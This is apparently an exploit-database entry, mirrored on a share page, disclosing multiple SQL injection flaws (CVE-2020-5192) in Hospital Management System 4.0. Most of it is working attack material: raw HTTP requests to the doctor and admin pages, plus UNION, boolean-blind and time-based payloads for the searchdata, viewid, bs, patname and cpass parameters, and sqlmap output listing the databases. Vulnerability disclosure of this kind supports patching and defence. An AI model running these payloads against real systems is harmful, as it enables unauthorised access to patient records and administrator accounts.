扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 |
# Exploit Title: Hospital Management System 4.0 - 'searchdata' SQL Injection # Google Dork: N/A # Date: 2020-01-02 # Exploit Author: FULLSHADE # Vendor Homepage: https://phpgurukul.com/ # Software Link: https://phpgurukul.com/hospital-management-system-in-php/ # Version: v4.0 # Tested on: Windows # CVE : CVE-2020-5192 # The Hospital Management System 4.0 web application is vulnerable to # SQL injection in multiple areas, listed below are 5 of the prominent # and easy to exploit areas. ================================ 1 - SQLi ================================ POST /hospital/hospital/hms/doctor/search.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 22 Origin: https://10.0.0.214 DNT: 1 Connection: close Referer: https://10.0.0.214/hospital/hospital/hms/doctor/search.php Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 searchdata=&search= ?searchdata parameter is vulnerable to SQL injection under the search feature in the doctor login. POST parameter 'searchdata' is vulnerable. sqlmap identified the following injection point(s) with a total of 120 HTTP(s) requests: --- Parameter: searchdata (POST) Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: searchdata=' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(CONCAT('qvxbq','zIuFTDXhtLrbZmAXQXxIalrRpZgCjsPnduKboFfW'),'qpqjq'),NULL-- PqeG&search= --- [15:49:58] [INFO] testing MySQL [15:49:58] [INFO] confirming MySQL [15:49:58] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.41, PHP 7.4.1 back-end DBMS: MySQL >= 5.0.0 (MariaDB fork) [15:49:58] [INFO] fetching database names available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test ================================ 2 - SQLi ================================ GET parameter 'viewid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests: --- Parameter: viewid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: viewid=6' AND 3413=3413 AND 'nBkv'='nBkv Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: viewid=6' AND SLEEP(5) AND 'PJim'='PJim Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: viewid=6' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162767071,0x7957464b6f4a78624b536a75497051715a71587353746a4b6e45716441646345614f725449555748,0x717a717a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- XNyp [15:54:21] [INFO] fetching database names available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test GET /hospital/hospital/hms/doctor/view-patient.php?viewid=6 HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0 ?viewid parameter is vulnerable to SQLi while viewing a patient under the doctor login ================================ 3 - SQLi ================================ Parameter: bs (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: bp=123&bs=123' AND SLEEP(5) AND 'CKbI'='CKbI&weight=123&temp=123&pres=123&submit= ?bs parameter is vulnerable to SQL injection on the doctors login when adding medical history to a patient ================================ 4 - SQLi ================================ POST /hospital/hospital/hms/doctor/add-patient.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: https://10.0.0.214/hospital/hospital/hms/doctor/add-patient.php Content-Type: application/x-www-form-urlencoded Content-Length: 111 Origin: https://10.0.0.214 DNT: 1 Connection: close Cookie: PHPSESSID=301tn3sqt3gmimkc9epe7kjha5 Upgrade-Insecure-Requests: 1 patname= patname parameter is vulnerable to SQLi under the add patient in the doctor login ================================ 5 - SQLi ================================ --- Parameter: cpass (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: cpass=123' AND 4808=4808#&npass=123&cfpass=123&submit=123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind Payload: cpass=123' AND SLEEP(5)-- taxP&npass=123&cfpass=123&submit=123 --- available databases [6]: [*] hms [*] information_schema [*] mysql [*] performance_schema [*] phpmyadmin [*] test POST /hospital/hospital/hms/admin/change-password.php HTTP/1.1 Host: 10.0.0.214 User-Agent: Mozilla/5.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 38 Origin: http://10.0.0.214 DNT: 1 Connection: close Referer: http://10.0.0.214/hospital/hospital/hms/admin/change-password.php Cookie: PHPSESSID=g1mpom762nglpeptn51b4rg5h5 Upgrade-Insecure-Requests: 1 cpass=123&npass=123&cfpass=123&submit=123 the ?cpass parameter is vulnerable to blind SQL injection |
体验盒子
